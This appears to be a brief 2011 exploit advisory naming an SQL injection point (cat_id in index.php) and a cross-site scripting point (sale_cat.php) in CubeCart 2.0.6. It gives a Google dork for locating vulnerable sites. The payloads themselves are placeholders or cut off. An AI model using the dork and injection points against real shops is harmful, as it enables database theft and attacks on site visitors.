########################################################## # Exploit Title: CubeCart 2.0.6 SQL injection / Cross Site Scripting # Google Dork: "Powered by CubeCart 2.0.6" # home : http://www.D99Y.com # Date: 2/3/2011 # Author: NassRawI # Software Link: http://www.cubecart.com # Version: 2.0.6 ########################################################## # # [1] SQL injection # # file : # # index.php # # exploit : # # http://localhost/index.php?cat_id= [ SQL injection ] # # [2] Cross Site Scripting # # file : # # sale_cat.php # # exploit : # # http://localhost/sale_cat.php/" [ XSS ] # # http://localhost/sale_cat.php/" # # http://localhost/sale_cat.php/" # # ########################################################## Greetz : D99Y Team + alroo7 alte no tkda3 + moot almsh3er + mahmoudvip + ‏Difficult 511 and all members D99Y.CoM Enjoy :)